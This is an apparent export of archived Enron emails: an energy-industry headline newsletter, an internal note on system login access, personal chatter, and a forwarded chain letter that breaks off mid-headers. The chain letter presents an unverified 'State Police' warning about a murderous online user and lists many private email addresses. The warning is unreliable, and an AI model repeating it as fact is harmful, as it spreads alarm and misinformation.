City-Owned Electric Companies in Utah Announce Rate Hikes_x000D_
_x000D_
Orange County, Calif., Treasurer Defends Investments in Troubled Utility_x000D_
_x000D_
San Diego Gas, Electric Firm Wants to Raise Rates 17 Percent_x000D_
_x000D_
California Awaits Electricity Suppliers' Energy-Contract Bids_x000D_
_x000D_
Newark, N.J.-Based Utility Group Beats Forecasts, Predicts Strong Future_x000D_
_x000D_
All Eyes Are on California's Delicate Balance of Power_x000D_
_x000D_
New Jersey Utility Reports Increase in Earnings_x000D_
_x000D_
Macon, GA., Water Authority to Launch Investigation Into Employee's Death_x000D_
_x000D_
Texas Utility Commission Proposes More Flexibility for Deregulation_x000D_
_x000D_
Houston-Based Energy Firms Submit Bids in California Utility Contract Auction_x000D_
_x000D_
Texas Utility Regulators Propose Summer Electricity Surcharge_x000D_
_x000D_
California Government Funds Ease Power Crisis; More Solutions Sought_x000D_
_x000D_
Former Nuclear Weapons Workers Settle with Babcock &amp; Wilcox of Ohio_x000D_
_x000D_
Ohio Utility Dpl Inc. Generates Record Profit for 2000_x000D_
_x000D_
Detroit Free Press Doron Levin Column_x000D_
_x000D_
Alliant Energy Maintains That Higher Electric Bills Are Linked to Gas Prices_x000D_
_x000D_
Iowa Utility Billing Change Could Result in Savings for Customers_x000D_
_x000D_
Livermore, Calif., Windmills May Help with Power Supply Over Summer_x000D_
_x000D_
Owner of Contra Costa County, Calif., Power Plants Withdraws Tax Cut Appeal_x000D_
_x000D_
Manatee County, Fla., Approves Plans for New Power Plant_x000D_
_x000D_
Energy Crisis Forces California Power Companies to Cut Back on Outage Service_x000D_
_x000D_
Electric CO-OP Sues Amarillo, Texas-Based Utility Over Violation of Sales Pact_x000D_
_x000D_
Higher Utility Bills Have Amarillo, Texas, Residents Clamoring for Solutions_x000D_
_x000D_
Amarillo Globe-News, Texas, Energy Briefs Column_x000D_
_x000D_
Santa Fe, N.M.-Area Power Plant Gets Approval from Regulators_x000D_
_x000D_
-Utility's Plan to Build Power Plant in Noblesville, Ind., Generates _x000D_
Opposition_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
REUTERS_x000D_
----------------------------------------------------------------------_x000D_
Access stories online at: http://207.32.82.57/news/ElectricPower.html_x000D_
_x000D_
UPDATE 1-Potomac Electric Q4 operating profit_x000D_
_x000D_
N.Y. raises taxes to fund energy conservation programs_x000D_
_x000D_
Lernout &amp; Hauspie's former CEO Duerden quits board_x000D_
_x000D_
S&amp;P sees minimal risk of a power crisis in Europe_x000D_
_x000D_
UPDATE 2-California power crisis hits Phelps Dodge mines_x000D_
_x000D_
TXU backs EDP,Cajastur bid for Cantabrico_x000D_
_x000D_
Power shortfall threatens New York City economy--study_x000D_
_x000D_
UPDATE 3-EDP leads 2.7-bln-euro bid for Cantabrico_x000D_
_x000D_
Western Gas extends gas deliveries to PG&amp;E_x000D_
_x000D_
PG&amp;E urges regulators to secure Calif. gas supplies_x000D_
_x000D_
TABLE-Cinergy Q4 results, revs rise_x000D_
_x000D_
Greenpeace uses riot police van in nuclear protest_x000D_
_x000D_
WRAPUP 1-Calif. utilities get boost after state auction_x000D_
_x000D_
UPDATE 1-Enron says no stake hike in Indian unit_x000D_
_x000D_
Madrid shares flat, electric cos, Popular rally_x000D_
_x000D_
TABLE - Keyspan Q4 oper EPS beats estimate_x000D_
_x000D_
UPDATE 2-Sempra earnings decline is smaller than expected_x000D_
_x000D_
Laclede Q1 earnings almost double, plans new hldg grp structure_x000D_
_x000D_
Enron ups 2001 profit target on continued strength_x000D_
_x000D_
Cinergy Q4 earns rise, top Street view_x000D_
_x000D_
Allegheny Q4 earns rise less than expected_x000D_
_x000D_
Scottish Power mulling Powergen bid but will wait_x000D_
_x000D_
Japan utilities hike rates due to higher fuel cost_x000D_
_x000D_
TABLE - Sempra Energy Q4 EPS 47 cts_x000D_
_x000D_
PSEG prices $2.5 bln stranded cost bonds_x000D_
_x000D_
MDU Resources Q4 net rises, sees 2001 on track_x000D_
_x000D_
UPDATE 1-Calif. power crisis 'significant problem'-Greenspan_x000D_
_x000D_
Sempra Energy fourth quarter profits slip_x000D_
_x000D_
UPDATE 1-MDU Resources Q4 net rises, sees 2001 on track_x000D_
_x000D_
UPDATE 1-French EdF to open 42 pct power market by 2003_x000D_
_x000D_
Kenya lifts biting power rationing as drought ends_x000D_
_x000D_
S&amp;P revises Green Mountain Power outlook_x000D_
_x000D_
Energy wholesalers profiteering or just profiting?_x000D_
_x000D_
Indian utility to miss deadline for paying Enron_x000D_
_x000D_
Calif. power shortage improving, alert may be downgraded_x000D_
_x000D_
*********************************************************_x000D_
NEW on the POWERMARKETERS.COM TRAINING PAGE_x000D_
*********************************************************_x000D_
Access all online presentations at: http://www.pmaconference.com_x000D_
_x000D_
New! Now you can choose to stream the presentation immediately over the web, _x000D_
or download it to your computer for later viewing-- Free!_x000D_
_x000D_
New! Five additional RealVideo-based powerpoint-based presentations, with the _x000D_
accompanying audio. Running about 30 minutes each, the new selections include:_x000D_
_x000D_
ELECTRONIC TRADING. Power is following natural gas to become an _x000D_
electronically-traded commodity. The products, the technology and the future _x000D_
of electricity transactions. Kevin Sluder, Vice President, HoustonStreet _x000D_
Exchange._x000D_
_x000D_
NUTS AND BOLTS OF RETAILING. What it takes to put an energy retailing _x000D_
operation together-- the cash and credit requirements, back office, _x000D_
information technology, staffing, marketing, sales and organizational _x000D_
considerations. Andrew Serri, Vice President, AmerenEnergy Marketing._x000D_
_x000D_
RETAIL: WHAT WENT WRONG, HOW TO FIX IT. Retail electric deregulation has thus _x000D_
far been an underwhelming success, but a great deal has been learned, and it _x000D_
is eminently fixable. By Dr. John O'Brien, Principal, Skipping Stone_x000D_
_x000D_
MANAGING BILLING. The complex requirements for managing billing and _x000D_
commodities in the deregulating energy industry cannot be met with current _x000D_
CIS and CRM technology. Energy Retailers must embrace the next evolution of _x000D_
energy customer management (ECM) solutions. Paul Grey, Chief Technology _x000D_
Officer, Peace Software._x000D_
_x000D_
THE INTERNET AND THE VELOCITY FACTOR. Greater price transparency, faster _x000D_
execution, reduced transaction costs, increased number and frequency of _x000D_
transactions and increased specialization are just some of the changes to _x000D_
energy markets wrought by the web, and it's just beginning. Implecations of _x000D_
the internet for energy markets. E. Russell "Rusty" Braziel, Chairman and _x000D_
Director, Altra Energy Technologies._x000D_
_x000D_
Access all online presentations at: http://www.pmaconference.com_x000D_
_x000D_
****************************************_x000D_
THE PowerMarketers.com ENERGYYELLOWPAGES_x000D_
****************************************_x000D_
http://www.energyyellowpages.net_x000D_
_x000D_
Where to go when you're looking for:_x000D_
Billing Systems, Brokers, Call Centers, Coal Marketers, Computers &amp;_x000D_
Networks, Conference Houses, Energy Management, Engineering Services,_x000D_
Environmental Services, Exchanges &amp; Clearing Houses, Executive Search_x000D_
Services, Financial Services, Gas Marketers, Information Services, Internet_x000D_
Services, Legal Services, Management Consulting , Marketing, Meters, Power_x000D_
Marketers, Powerplant Development, Powerplant Equipment, Risk Management,_x000D_
Sales, Software, Trade Associations, Training, Weather Services and more!_x000D_
Check it out today! http://www.energyyellowpages.net/_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
OTHER NEWS &amp; INFORMATION FEATURES ON POWERMARKETERS.COM_x000D_
----------------------------------------------------------------------_x000D_
_x000D_
PRICEWATERHOUSECOOPERS NEXT-DAY POWERTRAX ELECTRIC PRICE INDEX:_x000D_
Access online at: http://www.powermarketers.com/p-trax.htm_x000D_
_x000D_
ELECTRICITY SPOT PRICES:_x000D_
Access online at: http://www2.dtnergy.com/pma/btu.plx_x000D_
_x000D_
ELECTRICITY FUTURES PRICES:_x000D_
Access online at: http://www.dtn.com/dtnonline/dtnergy/pma/pma.quotes.cfm_x000D_
_x000D_
NATURAL GAS FUTURES PRICES:_x000D_
Access online at: http://www.dtn.com/dtnonline/dtnergy/pma/pma.gas.quotes.cfm_x000D_
_x000D_
THE PowerMarketers.com JobSite:_x000D_
Access online at: http://www.powermarketers.com/pmajobs.htm_x000D_
A daily visit to "The PMA Jobs Site" at _x000D_
http://www.powermarketers.com/pmajobs.htm connects you to a wealth of power _x000D_
industry opportunities that could supercharge your career!_x000D_
PMA ONLINE MAGAZINE: Access online at: http://www.retailenergy.com/pmamag.htm_x000D_
_x000D_
News releases may be submitted to The PowerMarketers.com Power Report via _x000D_
e-mail to news@powermarketers.com_x000D_
_x000D_
Copyright 2000 by PowerMarketers.com: http://www.powermarketers.com/_x000D_
_x000D_
The PowerMarketers.com Power Report is a complimentary service of The Power _x000D_
Marketing Association. Headlines are copyrighted by their respective _x000D_
services: Reuters, Knight-Ridder, and others._x000D_
_x000D_
Subscriptions to the PowerMarketers.com Power Report are free - you will _x000D_
never be charged. You may redistribute this e-mail without change. You may _x000D_
not redistribute stories. To register for a free subscription, point your _x000D_
browser to: http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
TO UNSUBSCRIBE OR CHANGE your subscription, (1) point your browser to "The _x000D_
PMA OnLine Power Report" subscription services form at _x000D_
http://www.retailenergy.com/pma/dprreg.htm_x000D_
_x000D_
_x000D_
OR_x000D_
_x000D_
(2) , send a message to pma@powermarketers.com. Include "unsubscribe" in the _x000D_
subject and include your name and email address for confirmation.</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 00:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pinnamaneni.krishnarao@enron.com', 'martin.lin@enron.com', 'seksan.kiatsupaibul@enron.com', 'jaesoo.lew@enron.com', 'kenneth.parkhill@enron.com', 'tanya.tamarchenko@enron.com', 'rabi.de@enron.com', 'rakesh.bharati@enron.com', 'tom.barkley@enron.com', 'kevin.kindall@enron.com', 'alex.huang@enron.com', 'joseph.hrgovcic@enron.com', 'wichai.narongwanich@enron.com', 'sevil.yaman@enron.com', 'gwyn.koepke@enron.com', 'tom.halliburton@enron.com', 'bob.lee@enron.com', 'chonawee.supatgiat@enron.com', 'vince.kaminski@enron.com', 'praveen.mellacheruvu@enron.com', 'osman.sezgen@enron.com'})</t>
  </si>
  <si>
    <t>Livelink Access</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry for the miscommunication but your password is blank.  After you log in. _x000D_
please change your password by going to the Go To menu and change your _x000D_
password._x000D_
_x000D_
---------------------- Forwarded by Stinson Gibner/HOU/ECT on 03/06/2001 _x000D_
08:44 AM ---------------------------_x000D_
_x000D_
_x000D_
Stinson Gibner_x000D_
03/05/2001 03:37 PM_x000D_
To: Kenneth Parkhill/NA/Enron@ENRON, Jaesoo Lew/NA/Enron@ENRON, Tom _x000D_
Halliburton/Corp/Enron@Enron, Kevin Kindall/Corp/Enron@ENRON, Bob _x000D_
Lee/NA/Enron@Enron, Alex Huang/Corp/Enron@ENRON, Tanya _x000D_
Tamarchenko/HOU/ECT@ECT, Joseph Hrgovcic/Enron@EnronXGate, Gwyn _x000D_
Koepke/NA/Enron@Enron, Rakesh Bharati/NA/Enron@Enron, Martin Lin/HOU/ECT@ECT, _x000D_
Rabi De/NA/Enron@ENRON, Chonawee Supatgiat/Corp/Enron@Enron, Seksan _x000D_
Kiatsupaibul/HOU/EES@EES, Wichai Narongwanich/HOU/EES@EES, Sevil _x000D_
Yaman/Corp/Enron@Enron, Tom Barkley/NA/Enron@Enron, Pinnamaneni _x000D_
Krishnarao/HOU/ECT@ECT, Osman Sezgen/HOU/EES@EES, Praveen _x000D_
Mellacheruvu/HOU/EES@EES, Sandeep Kohli@Enron, Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Livelink Access_x000D_
_x000D_
You have been added to the Livelink test instance for research.   See below _x000D_
for the link._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Stinson Gibner/HOU/ECT on 03/05/2001 _x000D_
03:32 PM ---------------------------_x000D_
   _x000D_
                        	_x000D_
	Enron Technology_x000D_
	_x000D_
	From:  Moyez Lallani @ ENRON                           01/16/2001 10:46 AM_x000D_
	_x000D_
_x000D_
To: Stinson Gibner/HOU/ECT@ECT, Vasant Shanbhogue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Livelink Access_x000D_
_x000D_
Gentlemen, _x000D_
_x000D_
I have created a folder called Research Projects Folder in the Livelink test _x000D_
instance.  The URL to the test instance is _x000D_
_x000D_
http://nahou-kmcprm01t/livelink/livelink.exe_x000D_
_x000D_
To log in, use your NT login id as your userid and password (all lowercase).  _x000D_
You will find the folder on the Enterprise Workspace.  Please call me should _x000D_
you require further assistance._x000D_
_x000D_
Moyez Lallani_x000D_
X5-3683_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Apr 2000 07:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: West Region Job Posting</t>
  </si>
  <si>
    <t xml:space="preserve">I've been in you house since then.  I also have a doggie book in the back of _x000D_
my car that belongs to you._x000D_
_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: West Region Job Posting  _x000D_
_x000D_
You haven't seen me since Thanksgiving Day...you don't want to break your _x000D_
record now....._x000D_
_x000D_
_x000D_
_x000D_
Chris Germany@ECT_x000D_
04/06/2000 02:46 PM_x000D_
To: Marde L Driscoll/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: West Region Job Posting  _x000D_
_x000D_
C'mon - I want a free lunch.  I could interduce you to a new place, real _x000D_
close to work._x000D_
_x000D_
_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: West Region Job Posting  _x000D_
_x000D_
No, 'cause you can't type!_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany@ECT_x000D_
04/06/2000 01:51 PM_x000D_
To: Marde L Driscoll/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: West Region Job Posting  _x000D_
_x000D_
I think I might call.  Would you take me our for a free lunch?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Jan 2002 10:59:10 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'asokan@yahoo.com'})</t>
  </si>
  <si>
    <t>Happy new year</t>
  </si>
  <si>
    <t>Hi Harry,_x000D_
My best wishes for a happy 2002._x000D_
Regards._x000D_
Asokan Manohar_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Send your FREE holiday greetings online!_x000D_
http://greetings.yahoo.com</t>
  </si>
  <si>
    <t>Tue, 26 Feb 2002 10:52:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'vamtblues@aol.com', 'jhyatt@msn.com', 'resqdisp@yahoo.com', 'kcarrlcsw@aol.com', 'apdiving@aol.com', 'elena_carver@yahoo.com', 'kravenoriole5610@msn.com', 'fowlerj_23102@msn.com', 'sweetie05291983@msn.com', 'bandrews257@aol.com', 'mbock@kgo.csc.com', 'm011602@yahoo.com', 'mdockens79@msn.com', 'emt607@aol.com', 'nncymorgan@msn.com', 'cardiac696@aol.com', 'rda2c@unix.mail.virginia.edu'})</t>
  </si>
  <si>
    <t>Don't know if true but...Fwd: Fw: Fw: State Police Warning for_x000D_
 online</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
&gt;From: "stanley czajkowski" &lt;sjplus5@hotmail.com&gt;_x000D_
&gt;To: BJLord2@aol.com, cahemming@hotmail.com, Cardiac696@aol.com,=20_x000D_
&gt;cardiac734@aol.com, cardiactech@adelphia.net, CertifiableX2@aol.com,=20_x000D_
&gt;cmarsh3892@aol.com, dwestwood@erols.com, emsequalnolife@aol.com,=20_x000D_
&gt;found1@earthlink.net, Gary_Butt@dom.com, haasdc@borg.com,=20_x000D_
&gt;haasmb@netscape.net, JamesClore@aol.com, jons_stang@yahoo.com,=20_x000D_
&gt;jwalsh@medicorpihn.com, kesterl@hoffman.army.mil, kidd108@attbi.com,=20_x000D_
&gt;ladybee108@webtv.net, Larry.Gordon@usmc-mccs.org, laxgodmom@adelphia.net,=_x000D_
=20_x000D_
&gt;maniac_8@hotmail.com, okfine66@aol.com, pd4byot@aol.com, pita651@aol.com,=_x000D_
=20_x000D_
&gt;ralph.walters@gsa.gov, rdavies@twcny.rr.com, s-t-a-k@msn.com,=20_x000D_
&gt;shedrick@erols.com, tabrams@gargerassoc.com, tina_leavy@msn.com,=20_x000D_
&gt;welsh@ibb.gov, Wollimat1@cs.com_x000D_
&gt;Subject: Fwd: Fw: Fw: State Police Warning for online_x000D_
&gt;Date: Sun, 24 Feb 2002 19:54:53 -0500_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;&gt;From: "Kathy S. Williams" &lt;katwilliams@juno.com&gt;_x000D_
&gt;&gt;To: BBrogo@aol.com, sjplus5@juno.com, SEANO231@aol.com, cocoppm@msn.com,_x000D_
&gt;&gt;     NanFolks00@aol.com, grumby@dreamscape.com, zoey233@cs.com,_x000D_
&gt;&gt;melwilliams72@hotmail.com, wanwood@adelphia.net, topreader1@juno.com,_x000D_
&gt;&gt;  timdawg1023@cs.com_x000D_
&gt;&gt;Subject: Fw: Fw: State Police Warning for online_x000D_
&gt;&gt;Date: Sun, 24 Feb 2002 09:50:03 -0500_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; &gt; &gt;&gt; Original Message ----- Subject: State Police warning for Online_x000D_
&gt;&gt; &gt;&gt;_x000D_
&gt;&gt; &gt;&gt;_x000D_
&gt;&gt; &gt;&gt;_x000D_
&gt;&gt; &gt;&gt;_x000D_
&gt;&gt; &gt;&gt; &gt;&gt;&gt; State police warning for online:_x000D_
&gt;&gt; &gt;&gt;&gt;_x000D_
&gt;&gt; &gt;&gt;&gt; Please read this "very carefully"...then send it out to all the_x000D_
&gt;&gt; &gt;&gt;&gt; people_x000D_
&gt;&gt; &gt;&gt;&gt; online that you know.  Something like this is nothing to take_x000D_
&gt;&gt; &gt;&gt;&gt; casually;_x000D_
&gt;&gt; &gt;&gt;&gt; this is something you DO want to pay attention  to. Think of it as a_x000D_
&gt;&gt; &gt;&gt;&gt; bit_x000D_
&gt;&gt; &gt;&gt;&gt; of advice too. If a person with the screen-name of Slavemaster_x000D_
&gt;&gt; &gt;&gt;&gt; contacts_x000D_
&gt;&gt; &gt;&gt;&gt; you, do not reply. DO not talk to this person; do not answer any of_x000D_
&gt;&gt; &gt;&gt;&gt; his/her instant Messages or e-mail. Whoever this person may be,_x000D_
&gt;&gt; &gt;&gt;&gt; he/she_x000D_
&gt;&gt; &gt;&gt;&gt; is a suspect for murder in the death of 56 women (so far) contacted_x000D_
&gt;&gt; &gt;&gt;&gt; through the Internet. Please send this to all the women on your_x000D_
&gt;&gt; &gt;&gt;&gt; buddy_x000D_
&gt;&gt; &gt;&gt;&gt; list and ask them to pass this on, as well. This screen-name was_x000D_
&gt;&gt; &gt;&gt;&gt; seen on_x000D_
&gt;&gt; &gt;&gt;&gt; Yahoo, AOL, and Excite, so far. This is not a joke! Please send this_x000D_
&gt;&gt; &gt;&gt;&gt; to_x000D_
&gt;&gt; &gt;&gt;&gt; men too...just in case! Send to everyone you know! Ladies, this is_x000D_
&gt;&gt; &gt;&gt;&gt; serious._x000D_
&gt;&gt; &gt;&gt;&gt;_x000D_
&gt;&gt; &gt;&gt;&gt; Jennifer S. Faulkner_x000D_
&gt;&gt; &gt;&gt;&gt; Education/Information Specialist_x000D_
&gt;&gt; &gt;&gt;&gt; Roanoke Fire-EMS_x000D_
&gt;&gt; &gt;&gt;&gt; 541 Luck Avenue, Suite 120_x000D_
&gt;&gt; &gt;&gt;&gt; Roanoke, VA 24016_x000D_
&gt;&gt; &gt;&gt;&gt; (540) 853-2257 (phone)_x000D_
&gt;&gt; &gt;&gt;&gt; (540) 853-1172 (fax)_x000D_
&gt;&gt; &gt;&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;__________________________________________________________________x000D_
&gt;Send and receive Hotmail on your mobile device: http://mobile.msn.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
Join the world's largest e-mail service with MSN Hotmail.=20_x000D_
http://www.hotmail.com_x000D_
_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;bcredle59@hotmail.com&gt;_x000D_
CC: AGiacobbe@aol.com, BILLONE2@Juno.com, parmelee@acmenet.net, bobnls@yaho=_x000D_
o.com, bunny@dreamscape.com, peabody@cyberback.com, carh@hrcreditunion.net,=_x000D_
 evergrove.green@juno.com, kcshoney@adelphia.net, CynthiaKillian@aol.com, d=_x000D_
avesellars@adelphia.net, credlesr@yahoo.com, DSDCAD51@AOL.com, rpckwaj@hyde=_x000D_
county.net, Alelpoll@aol.com, eabarbaris@townecraft.com, MGMSTAR@webtv.net,=_x000D_
 samsizer@borg.com, cfrogers@northnet.org, Tanybrynfarm@aol.com, Spockrjh@j=_x000D_
uno.com, sanddd@dreamscape.com, hermine@mindspring.com, HLW2@cornell.edu, N=_x000D_
JYagey@aol.com, KJHarter230@netzero.net, kraeger@dreamscape.com, js10216@ao=_x000D_
l.com, jsimson@borg.com, JPD0819@aol.com, kbwalker@maranatha.net, Laurie.J.=_x000D_
Waters@Hitchcock.ORG, RikkiWC@aol.com, EMSchuyler@aol.com, jenr8@borg.com, =_x000D_
BBFEB99@aol.com, markee13323@yahoo.com, judmary@mymailstation.com, MaybellD=_x000D_
ana@aol.com, mkschoen@earthlink.net, odatmpc@hotmail.com, nanwes1@cs.com, w=_x000D_
arefarnham@aol.com, THE-SERIANNIS@email.msn.com, spaghetti1@adelphia.net, G=_x000D_
oodiefam4@aol.com, muskrat@americu.net, adkbaske_x000D_
Date: Tuesday, February 19, 2002 2:24:36 GMT_x000D_
Subject:=20_x000D_
_x000D_
t@yahoo.com, RDoty32958@aol.com, vijay_hira@hotmail.com_x000D_
Bcc:=20_x000D_
Subject: Fwd: [Fwd: warning from state police]_x000D_
Date: Mon, 18 Feb 2002 21:23:49 -0500_x000D_
Mime-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary=3D"----=3D_NextPart_000_3064_3de3_2=_x000D_
4e8"_x000D_
Message-ID: &lt;F133Fsxf4yp8ARf3sll000076e8@hotmail.com&gt;_x000D_
X-OriginalArrivalTime: 19 Feb 2002 02:24:13.0700 (UTC) FILETIME=3D[85A41440=_x000D_
:01C1B8EC]_x000D_
This is a multi-part message in MIME format._x000D_
_x000D_
------=3D_NextPart_000_3064_3de3_24e8_x000D_
Content-Type: text/html_x000D_
_x000D_
&lt;html&gt;&lt;div style=3D'background-color:'&gt;&lt;DIV&gt;_x000D_
&lt;P&gt;&lt;BR&gt;&lt;BR&gt; &lt;/P&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;From: "Lenee Roberts" &lt;BUMBLEBEA14@HOTMAIL.COM&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;To: bbyma@hotmail.com, bcredle59@hotmail.com, bebediva1@aol.com=_x000D_
, BocesPD1@cs.com, Bootie125@aol.com, chrissmitty33@aol.com, CluelessQueen1=_x000D_
3@aol.com, condog942@hotmail.com, Dreambaby6@hotmail.com, eour2smoth@aol.co=_x000D_
m, itailiangodess25@aol.com, Jcscalzo1@aol.com, JPD0819@aol.com, jvanpatten=_x000D_
17@hotmail.com, keystone66@Juno.com, lerafarm@netzero.net, meggerz4ever@yah=_x000D_
oo.com, misstalkative12@juno.com, mkrkmr@hotmail.com, patmcgarr@hotmail.com=_x000D_
, peaches_82582@yahoo.com, rustey4life@aol.com, Sparkel918@aol.com, stephie=_x000D_
jb6@aol.com, strawberrynabox@aol.com, thestar123@hotmail.com, tyler8rob@hot=_x000D_
mail.com, waltzinqfaq@aol.com=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;Subject: Fwd: [Fwd: warning from state police]=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;Date: Sat, 16 Feb 2002 22:23:17 -0500=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;&gt;From: ItalianGodess25@aol.com=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;&gt;To: TrllJamie@aol.com, bbyblusnobunni@yahoo.com, Kay669@aol.co=_x000D_
m,=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;&gt; Crnkybtch14@aol.com, bumblebea14@hotmail.com,=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;&gt;blondieajw7020@yahoo.com=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;&gt;Subject: Fwd: [Fwd: warning from state police]=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;&gt;Date: Mon, 11 Feb 2002 17:51:20 EST=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;&gt;=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&gt;&gt;=20_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;_x000D_
&lt;DIV&gt;&lt;/DIV&gt;&lt;/div&gt;&lt;br clear=3Dall&gt;&lt;hr&gt;Join the world's largest e-mail servic=_x000D_
e with MSN Hotmail. &lt;a href=3D'http://go.msn.com/bql/hmtag4_etl_EN.asp'&gt;Cli=_x000D_
ck Here&lt;/a&gt;&lt;br&gt;&lt;/html&gt;_x000D_
------=3D_NextPart_000_3064_3de3_24e8_x000D_
Content-Type: message/rfc822_x000D_
Content-Disposition: inline_x000D_
_x000D_
Return-path: &lt;TrllJamie@aol.com&gt;_x000D_
From: TrllJamie@aol.com_x000D_
Full-name: TrllJamie_x000D_
Message-ID: &lt;51.18da89eb.29985dc3@aol.com&gt;_x000D_
Date: Sun, 10 Feb 2002 18:35:31 EST_x000D_
Subject: Fwd: [Fwd: warning from state police]_x000D_
To: ItalianGodess25@aol.com_x000D_
CC: blondieajw7020@yahoo.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary=3D"part2_f8.1691eef9.29985dc3_bound=_x000D_
ary"_x000D_
X-Mailer: AOL 6.0 for Windows US sub 10551_x000D_
_x000D_
_x000D_
--part2_f8.1691eef9.29985dc3_boundary_x000D_
Content-Type: text/plain; charset=3D"US-ASCII"_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
_x000D_
_x000D_
--part2_f8.1691eef9.29985dc3_boundary_x000D_
Content-Type: message/rfc822_x000D_
Content-Disposition: inline_x000D_
_x000D_
Return-path: &lt;Stephiejb6@aol.com&gt;_x000D_
From: Stephiejb6@aol.com_x000D_
Full-name: Stephiejb6_x000D_
Message-ID: &lt;107.cb74e53.29982187@aol.com&gt;_x000D_
Date: Sun, 10 Feb 2002 14:18:31 EST_x000D_
Subject: Fwd: [Fwd: warning from state police]_x000D_
To: Jodyl923@aol.com, LilDevil417916@aol.com, ChRiSTiNa81626@aol.com,_x000D_
    BillysPrincess72@aol.com, MEG8419@aol.com, TrllJamie@aol.com,_x000D_
    Kay669@aol.com, Nybabe4life84@cs.com, NYgirl69101@aol.com_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary=3D"part3_f8.1691eef9.29982187_bound=_x000D_
ary"_x000D_
X-Mailer: AOL 6.0 for Windows US sub 10552_x000D_
_x000D_
_x000D_
--part3_f8.1691eef9.29982187_boundary_x000D_
Content-Type: text/plain; charset=3D"US-ASCII"_x000D_
Content-Transfer-Encoding: 7bit_x000D_
_x000D_
_x000D_
_x000D_
--part3_f8.1691eef9.29982187_boundary_x000D_
Content-Type: message/rfc822_x000D_
Content-Disposition: inline_x000D_
_x000D_
Return-path: &lt;Chickee582@aol.com&gt;_x000D_
From: Chickee582@aol.com_x000D_
Full-name: Chickee582_x000D_
Message-ID: &lt;ea.225fd65d.299706b5@aol.com&gt;_x000D_
Date: Sat, 9 Feb 2002 18:11:49 EST_x000D_
Subject: Fwd: [Fwd: warning from state police]_x000D_
To: KACTyson@aol.com_x000D_
CC: FFCurry48@aol.com, Stantion24602@aol.com, EMG021@aol.com, Krans03@aol.c=_x000D_
om,_x000D_
    JDKBFC109@aol.com, Bootie125@aol.com, JRMEDIC52@aol.com,_x000D_
    Jody1923@aol.com, Farm996917@aol.com, J69T69W@hotmail.com,_x000D_
